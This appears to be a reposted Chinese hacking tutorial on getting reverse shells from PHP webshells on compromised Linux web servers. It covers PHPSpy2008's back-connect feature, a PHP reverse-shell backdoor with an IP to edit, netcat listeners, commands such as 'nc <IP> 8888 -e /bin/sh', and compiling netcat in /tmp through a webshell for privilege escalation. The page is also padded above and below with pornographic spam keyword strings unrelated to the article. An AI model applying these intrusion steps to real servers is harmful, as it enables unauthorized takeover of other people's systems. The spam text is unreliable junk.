国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

Linux下通過WebShell反彈Shell的技巧

安全 黑客攻防
Linux下通過WebShell反彈CmdShell,在網(wǎng)站服務(wù)器入侵提權(quán)過程中的應(yīng)用比Windows環(huán)境下更廣更頻繁。Linux提權(quán)絕大部分都靠的是Local Exploit。WebShell一般都可以執(zhí)行命令,但是溢出必須在可交互環(huán)境運行,否則如果直接在WebShell執(zhí)行,即使能溢出提權(quán)成功,也沒法利用。因此必須要反彈一個Shell命令行窗口,在命令行終端下執(zhí)行溢出進行提權(quán)。

Linux下通過WebShell反彈CmdShell,在網(wǎng)站服務(wù)器入侵提權(quán)過程中的應(yīng)用比Windows環(huán)境下更廣更頻繁。Linux提權(quán)絕大部分都靠的是Local Exploit。WebShell一般都可以執(zhí)行命令,但是溢出必須在可交互環(huán)境運行,否則如果直接在WebShell執(zhí)行,即使能溢出提權(quán)成功,也沒法利用。因此必須要反彈一個Shell命令行窗口,在命令行終端下執(zhí)行溢出進行提權(quán)。

使用PHP WebShell木馬反彈Shell

一般情況下,大多數(shù)PHP WebShell木馬后門都帶有的Back Connect功能彈回一個Shell。例如在PHPSpy2008木馬后門中,有一個Back Connect反彈連接功能,可以反彈獲得一個繼承當前WebShell權(quán)限的Shell命令窗口。

在使用Back Connect反彈連接功能前,首先需要使用NC工具在本地監(jiān)聽一個未使用的端口,例如監(jiān)聽本地8888端口,執(zhí)行如下命令:

  1. nc -vv -l -p 8080 

然后在WebShell的Back Connect反彈連接功能頁中,會自動檢測本機的IP地址,在"Your IP"中顯示本機IP,在"Your Port"中輸入監(jiān)聽的端口,這里為8080。然后選擇要使用的反彈連接方式,PHPSpy2008提供了兩種反彈連接方式,Perl和C,這里使用Perl反彈(圖1)。

圖1

圖1

設(shè)置完畢后,點擊"Start"按鈕,即可發(fā)送Shell窗口到監(jiān)聽端口了。在NC監(jiān)聽窗口中,可得到一個Shell命令行窗口(圖2)。

圖1

圖2

除了PHPSpy2008之外,還有一些專用的PHP反彈shell網(wǎng)頁后門。首先在本地用文本編輯器打開PHP反彈shell網(wǎng)頁后門文件,在其中找到如下代碼內(nèi)容:

  1. $yourip = "111.123.96.28";  
  2.  
  3. $yourport = '8888'

圖3

圖3

修改設(shè)置其中的反彈IP地址111.123.96.28為本機IP地址,默認反彈端口為8888,可進行修改(圖3)。修改后保存文件,將其通過WebShell上傳。假設(shè)上傳后的鏈接地址為http://www.***.com/shell.php。然后在本地打開命令提示符窗口,執(zhí)行如下命令:

  1. nc -vv -l -p 8888 

使用nc監(jiān)聽本地的8888端口。在瀏覽器中訪問http://www.***.com/shell.php,在nc監(jiān)聽的端口中,就可以獲得一個從網(wǎng)站服務(wù)器上返回來的命令行Shell了。#p#

使用NC反彈Shell

在進行Shell反彈時,有時會碰到服務(wù)器不支持PHP或者WebShell無法成功反彈Shell的情況,例如有的服務(wù)器只支持JSP,不支持PHP。此時,可以同樣采用Windows下的經(jīng)典的NC反彈Shell方法。

在Windows下反彈CmdShell時,首先要在本機運行"nc -vv -l -p 端口號"監(jiān)聽端口,然后在WebShell中執(zhí)行"nc -e cmd.exe 監(jiān)聽主機IP地址  端口",就可以反彈一個CmdShell。這個方法在Linux中仍然可行,只不過需要作一點小小的改動。

--在本機監(jiān)聽端口后,在WebShell運行nc反彈時,需要發(fā)送的是"/bin/sh",而不是cmd.exe,這樣才夠反彈發(fā)送一個Linux下的Shell命令行窗口給監(jiān)聽主機。例如執(zhí)行如下命令:

  1. nc 119.1.44.32 8888 -e /bin/sh 

即可反彈一個Shell到IP地址為119.1.44.32的監(jiān)聽主機的8888端口。#p#

遠程主機無NC工具時的解決辦法

在使用NC反彈Shell時,還會碰到遠程主機上不能直接執(zhí)行nc,或者沒有安裝nc工具。碰到這樣的情況,可以給手工給遠程主機安裝一個NC,比較方便的方法是,到http://netcat.sourceforge.net/download.php下載nc源碼,然后在本地Linux機器上編譯成可執(zhí)行程序后,再將編譯文件上傳到遠程主機上。如果本地編譯的程序在遠程主機上無法使用,可以直接把源碼傳上去后,在目標機器上直接編譯。

如果需要在目標機器上編譯NC的話,需要注意一些問題,因為在得到Shell命令行窗口前,只能在WebShell里執(zhí)行命令,一般每次只能執(zhí)行一條,然后等待執(zhí)行后的結(jié)果回顯。

另外,在編譯時需要注意程序執(zhí)行路徑的問題。由于Linux下權(quán)限設(shè)置非常嚴格,即使攻擊者獲得了WebShell,也可能無法直接在WEB網(wǎng)頁目錄下寫入文件,只能在/tmp之類的文件夾中上傳寫入NC源文件(圖4)。

圖4

圖4

例如WebShell在/var/www/目錄,那么在WebShell中執(zhí)行命令默認的當前路徑都是/var/www/,如果netcat源碼包解壓在了/tmp/netcat-0.7.1文件夾,在編譯netcat進行make操作時,由于當前路徑是/var/www/,而不是/tmp/netcat-0.7.1,所以在make操作時會出錯。解決這個問題其實很簡單,可以直接把切換路徑和make操作兩句命令寫成一句,用分號隔開寫就可以了。

將netcat-0.7.1源文件上傳到可寫文件夾/tmp中后,在WebShell中編譯nc的操作過程及命令如下:

  1. cd /tmp;tar zxvf /tmp/netcat-0.7.1.tar.gz 

圖5

圖5

執(zhí)行該命令后,可以將netcat-0.7.1源文件解壓到/tmp/netcat-0.7.1目錄中(圖5)。然后再執(zhí)行命令:

  1. /tmp/netcat-0.7.1/configure 

配置完畢后,再執(zhí)行如下命令進行編譯:

  1. cd /tmp/netcat-0.7.1;make 

由于使用了分號,可同時執(zhí)行兩條命令,將make跟在目錄切換命令后面,在編譯的時候就不會報錯了(圖6)。#p#

圖6 

圖6

 

編譯成功以后,就可以輸入命令反彈Shell了,例如這里nc路徑是/tmp/netcat-0.7.1/nc,在本地執(zhí)行"nc -vv -l -p 8080"命令監(jiān)聽8080號端口后,在WebShell中執(zhí)行如下命令(圖7):

  1. cd /tmp/netcat-0.7.1;nc 119.1.58.126 8080 -e /bin/sh 

圖7

圖7

即可向主機反彈回一個Shell命令行窗口了。需要注意的是,反彈的Linux Shell是沒有$提示符的,執(zhí)行一句返回一句(圖8)。另外,這里反彈Shell時候運行的是/bin/sh,也可以反彈運行/bin/bash,但/bin/sh的權(quán)限比/bin/bash要設(shè)置松一些,因此成功率更高一些。

圖8

圖8

【編輯推薦】

  1. 加固IIS讓W(xué)ebshell的簡單概述
  2. 通過重建方法獲取webshell
  3. 十項Linux安全管理技巧經(jīng)驗匯總
  4. Linux網(wǎng)絡(luò)防火墻的實現(xiàn)并不難!
責任編輯:佟健 來源: 《大中型網(wǎng)絡(luò)入侵要案》
相關(guān)推薦

2009-07-19 10:48:53

LinuxWebShell反彈CmdLine She

2009-08-07 10:18:13

Linux反彈CmdLine S技巧

2018-06-18 10:33:39

Linux內(nèi)網(wǎng)技巧

2017-09-04 16:20:38

Linuxshell命令

2015-03-06 15:43:39

2009-10-23 08:41:14

Linux系統(tǒng)操作系統(tǒng)Grub

2010-09-26 16:46:05

2013-12-02 09:49:59

2014-07-31 11:24:21

Linuxshell命令

2009-12-03 10:07:55

Linuxman命令使用技巧

2015-03-09 10:22:23

2009-06-19 13:32:40

Java開啟OpenGL

2020-09-14 08:23:56

日期時間Shell

2013-06-28 10:12:20

Linux軟Raid自動重組

2014-07-31 12:07:15

Linux

2019-12-04 12:28:24

TOP命令Linux

2019-08-14 08:03:49

LinuxShell腳本web服務(wù)

2021-12-16 10:53:23

shell命令腳本

2015-09-09 13:29:17

FISHShellLinux

2011-12-01 11:02:35

點贊
收藏

51CTO技術(shù)棧公眾號

国产区精品在线观看| 最近高清中文在线字幕在线观看| 婷婷亚洲五月色综合| 久久久黄色av| 日本美女一区| 日韩成人小视频| 91高清在线观看视频| 色一情一乱一乱一91av| 伊人精彩视频| 亚洲免费资源在线播放| 能在线观看的av网站| 国产91精品一区二区麻豆亚洲| 久久久福利视频| 影音先锋亚洲一区| 高清国产在线一区| 国产综合网站| 国产欧美综合精品一区二区| 欧美日本二区| 国产精品视频在线免费观看| 亚洲国产精品91| 亚洲一区二区三区在线视频 | 26uuuu精品一区二区| gogogo免费高清日本写真| 国产亚洲一级| 精品亚洲欧美日韩| 香蕉成人久久| 视频在线观看成人| 久久成人麻豆午夜电影| 最新不卡av| gogo大胆日本视频一区| 成年人在线看片| 亚洲国产成人在线| 99精产国品一二三产品香蕉| 国产精品成人免费精品自在线观看| 亚欧在线免费观看| 欧美激情综合在线| 日日噜噜噜夜夜爽爽狠狠视频 | 成年人黄色片视频| 中文字幕一区二区三区在线不卡| 自由色视频.| 欧美人与禽zozo性伦| 黄色网址在线免费| 精品夜色国产国偷在线| 制服丝袜专区在线| 久久精品美女视频网站| 欧美日韩看看2015永久免费| 国产高清在线不卡| 2023国产精品久久久精品双| 狠狠色伊人亚洲综合网站色| 久久久噜噜噜| 草草久久久无码国产专区| 最新日韩av在线| 中出在线观看| 精品国产百合女同互慰| 成人污污视频| 亚洲aⅴ男人的天堂在线观看| 日日夜夜一区二区| 中文字幕乱码人妻综合二区三区| 一区二区三区影院| avav免费在线观看| 日韩一区av在线| 精品国精品国产自在久国产应用 | 欧美另类videos| 中文字幕一区av| yw视频在线观看| 中文字幕精品在线| 日本久久综合| 麻豆一区二区三区在线观看| 国产精品国产馆在线真实露脸| 男女污视频在线观看| 亚洲深夜福利在线| 99久久精品网站| 国产精品www在线观看| 精品美女久久久久久免费| 手机在线观看av| 国产美女精品视频免费观看| 九九精品视频在线看| 美女的尿口免费视频| 亚洲第一页自拍| 国产欧美高清视频在线| 伊人情人网综合| 亚洲第一激情av| 香蕉久久一区| 欧美一级爱爱| 亚洲综合免费观看高清完整版| 大桥未久在线视频| 国产日韩精品在线观看| 夫妻av一区二区| 91成人高清| 欧美一区视频在线| 老司机免费视频一区二区| 男生操女生视频网站| 国产一区二区动漫| 亚洲第一黄网| 骚视频在线观看| 久久亚洲精品国产亚洲老地址| 六月天综合网| 麻豆app在线观看| 欧美中文字幕第一页| 国产成人综合精品三级| 国产黄a三级三级三级av在线看| 国产精品草莓在线免费观看| 91丨porny丨蝌蚪视频| 国产中文在线播放| 国产一区在线免费观看| 亚洲亚洲人成综合网络| 亚洲成人黄色| 2018国产在线| 日韩精品久久久久久福利| 亚洲网站在线| 老司机色在线视频| 亚州国产精品久久久| 成人av网址在线| 美女网站视频在线| 国产精品视频免费一区二区三区| 亚洲大片精品永久免费| 精品国产影院| 久久美女福利视频| 伊人久久久久久久久久久| 久久精品国产一区二区| jizz性欧美10| 久久精品日产第一区二区三区| 午夜精品在线看| 手机在线一区二区三区| 国产夫妻视频| 青青草原成人在线视频| 国产精品每日更新| 国产乱论精品| 乱子伦视频在线看| 欧美精品在线免费观看| 91在线观看下载| 日韩电影精品| 国产日产欧美视频| 草民午夜欧美限制a级福利片| 成人黄色777网| 在线视频成人| 国产成人黄色网址| 1769国内精品视频在线播放| 中文字幕一区在线观看| 在线日本制服中文欧美| 亚洲电影欧美电影有声小说| 国产中文日韩欧美| 欧美性xxxxx| 亚洲一区二区毛片| 极品在线视频| 亚洲 欧美 综合 另类 中字| 中文字幕久久精品| 99视频一区二区| 高潮久久久久久久久久久久久久| 羞羞免费视频网站| 成人性生交大片免费观看嘿嘿视频| 色乱码一区二区三区88| 久久黄色网页| 韩国精品主播一区二区在线观看| 免费国产黄色网址| 午夜精品久久久久久99热软件| 亚洲综合在线免费观看| 欧美在线看片| 麻豆mv在线观看| 无码人妻精品一区二区三区66| 国产精品扒开腿做爽爽爽视频 | 色婷婷精品久久二区二区蜜臀av| 日韩精品免费看| 国产一区在线观| 黄页网址大全在线播放| 激情小视频在线| 国产ktv在线视频| 国产精品极品在线观看| 日韩精品永久网址| 91精品国产视频| 免费在线观看不卡| 国产精品人人做人人爽人人添| 国产精品资源网| 老司机午夜精品99久久| 秋霞电影一区二区| 色综合天天综合网国产成人综合天| 精品视频在线观看日韩| 久久精品中文字幕免费mv| 欧美最猛性xxxxx亚洲精品| 高清无码一区二区在线观看吞精| 亚洲熟妇av一区二区三区漫画| 国产性生活免费视频| 亚洲图区一区| 999视频精品| 91蜜桃在线观看| 色综合视频一区中文字幕| 亚洲精品永久www嫩草| 欧洲中文在线| 人人爽香蕉精品| 欧美性大战xxxxx久久久| 色婷婷综合久久久久| 无码人妻少妇伦在线电影| 视色视频在线观看| 亚洲承认视频| 99久热在线精品视频观看| 懂色av一区二区三区免费看| 美女网站在线免费欧美精品| 成人丝袜高跟foot| 日韩一区二区免费在线电影| 日韩aⅴ视频一区二区三区|